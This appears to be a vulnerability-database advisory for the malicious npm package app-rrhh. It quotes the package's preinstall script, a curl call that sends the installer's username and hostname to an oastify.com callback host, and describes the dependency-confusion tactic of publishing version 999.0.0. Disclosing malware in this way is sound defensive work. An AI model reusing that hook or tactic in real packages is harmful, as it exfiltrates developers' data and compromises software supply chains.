VDB
Sign up

MAL-2026-16144

Malicious code in app-rrhh (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cda153823a2c046e4d97069c84961e1a8b302fc425e238fce36bd8a205d19b88) package.json declares a preinstall script that runs `curl http://ebtld4p8aq3rl950g6jgn217aygp4fs4.oastify.com/$(whoami)/$(hostname)` on `npm install`. The installer's OS username and hostname are embedded in the URL path and sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, confirming code execution on the installing host and leaking installer identity data to an attacker-controlled destination. The package name `app-rrhh` at version `999.0.0` with a description referencing dependency confusion is consistent with a dependency-confusion attack shape designed to win resolution against an internal package of the same name.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/app-rrhh

No fixed version published yet for app-rrhh (npm). Pin to a known-safe version or switch to an alternative.

References